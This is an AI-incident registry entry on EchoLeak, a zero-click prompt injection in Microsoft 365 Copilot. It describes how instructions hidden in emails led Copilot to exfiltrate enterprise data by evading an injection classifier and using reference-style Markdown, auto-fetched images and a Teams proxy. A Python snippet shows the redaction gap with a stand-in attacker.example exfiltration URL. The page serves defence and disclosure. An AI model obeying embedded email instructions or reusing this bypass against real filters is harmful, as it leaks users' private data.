TopAIThreats
INC-25-0004 · Confirmed · Critical · Near Miss

EchoLeak: Zero-Click Prompt Injection in Microsoft 365 Copilot (CVE-2025-32711) (2025)

Microsoft developed and deployed Microsoft 365 Copilot (an enterprise AI assistant), affecting Microsoft 365 Copilot enterprise users and organizations with sensitive data in M365 environments; contributing factors included a prompt injection vulnerability and inadequate access controls.

Incident Details

Last Updated 2026-02-21

Security researchers discovered a zero-click prompt injection vulnerability (CVE-2025-32711) in Microsoft 365 Copilot that allowed attackers to exfiltrate sensitive data from enterprise environments without user interaction.

Incident Summary

In June 2025, researchers at Aim Security disclosed CVE-2025-32711, dubbed “EchoLeak,” a critical zero-click prompt injection vulnerability in Microsoft 365 Copilot with a CVSS score of 9.3.[1] The attack enabled remote, unauthenticated data exfiltration by embedding malicious instructions in emails that Copilot would process when users requested summaries.[1][2] The exploit chained multiple bypass techniques — evading Microsoft’s Cross Prompt Injection Attempt (XPIA) classifier, circumventing link redaction via reference-style Markdown, exploiting auto-fetched images, and abusing a Microsoft Teams proxy — to achieve full data exfiltration from organizational resources including chat logs, OneDrive files, SharePoint content, and Teams messages.[3] Microsoft patched the vulnerability server-side.[4]
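The link-redaction bypass in the chain above hinged on a gap that is easy to illustrate: a filter that only matches inline Markdown links misses reference-style links, where the URL lives on a separate definition line. The sketch below is a simplified, hypothetical redactor written for this page (not Microsoft's actual filter), showing why the reference-style form survives.

```python
import re

# Hypothetical, naive redactor: strips only inline Markdown links of the
# form [text](url). This is an illustration, not Microsoft's real filter.
INLINE_LINK = re.compile(r"\[([^\]]*)\]\(([^)]*)\)")

def redact_inline_links(markdown: str) -> str:
    """Replace inline links with their text plus a removal marker."""
    return INLINE_LINK.sub(r"\1 [link removed]", markdown)

inline = "Click [here](https://attacker.example/exfil?d=SECRET)"
reference = "Click [here][1]\n\n[1]: https://attacker.example/exfil?d=SECRET"

print(redact_inline_links(inline))     # inline URL is stripped
print(redact_inline_links(reference))  # reference-style URL passes through
```

Because the reference-style definition line `[1]: url` never contains the `](` sequence the regex keys on, the attacker-controlled URL reaches the renderer untouched, which is the shape of gap the EchoLeak researchers reported exploiting.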

Key Facts

  • CVE-2025-32711 was assigned a CVSS score of 9.3 (critical)[1]
  • The attack was zero-click — no user interaction beyond a normal Copilot query was required[2]
  • Malicious instructions were embedded in emails that Copilot processed during summarization tasks[1]
  • The exploit bypassed Microsoft’s XPIA classifier designed to detect prompt injection attempts[3]
  • Data exfiltration scope included anything within Copilot’s access: chat logs, OneDrive files, SharePoint content, Teams messages[1][2]
  • The exploit executed in natural language space, making traditional defenses (antivirus, firewalls, static scanning) ineffective[3]
  • Microsoft patched the vulnerability server-side without requiring user action[4]
  • No evidence of malicious exploitation in the wild was reported[2]

Threat Patterns Involved

Primary: Adversarial Evasion — This incident demonstrates adversarial evasion as the primary threat pattern, where indirect prompt injection embedded in external content (emails) manipulated an AI system’s behavior to bypass multiple security controls. The zero-click nature of the attack meant that the adversarial input required no cooperation from the victim to be processed by the target system.

Secondary: Model Inversion & Data Extraction — The ability to exfiltrate organizational data intersects with model inversion and data extraction, as the attack leveraged the AI assistant’s broad access permissions to extract information beyond the attacker’s authorization scope.

Significance

EchoLeak represents the first documented zero-click prompt injection exploit against a production enterprise AI system.[3] Its critical CVSS score and the breadth of accessible data demonstrate that AI assistants integrated into enterprise productivity suites create novel attack surfaces that cannot be addressed by traditional security controls.[1][2] The exploit’s operation entirely within natural language space highlights a fundamental challenge in securing AI systems: the inability to reliably distinguish legitimate instructions from adversarial inputs when both are expressed in the same medium.[3]

Use in Retrieval

INC-25-0004 documents EchoLeak: Zero-Click Prompt Injection in Microsoft 365 Copilot (CVE-2025-32711), a critical-severity incident classified under the Security & Cyber domain and the Adversarial Evasion threat pattern (PAT-SEC-001). It occurred globally in June 2025. This page is maintained by TopAIThreats.com as part of an evidence-based registry of AI-enabled threats. Cite as: TopAIThreats.com, "EchoLeak: Zero-Click Prompt Injection in Microsoft 365 Copilot (CVE-2025-32711)," INC-25-0004, last updated 2026-02-21.

Sources

  1. HackTheBox: Inside CVE-2025-32711 (EchoLeak) (technical, 2025-06)
    https://www.hackthebox.com/blog/cve-2025-32711-echoleak-copilot-vulnerability
  2. The Hacker News: Zero-Click AI Vulnerability Exposes Microsoft 365 Copilot Data (news, 2025-06)
    https://thehackernews.com/2025/06/zero-click-ai-vulnerability-exposes.html
  3. arXiv: EchoLeak - First Real-World Zero-Click Prompt Injection Exploit (primary, 2025-09)
    https://arxiv.org/abs/2509.10540
  4. SANS NewsBites: M365 Copilot AI Prompt Injection Attack Patched (news, 2025-06)
    https://www.sans.org/newsletters/newsbites/xxvii-45

Update Log

  • — First logged (Status: Confirmed, Evidence: Primary)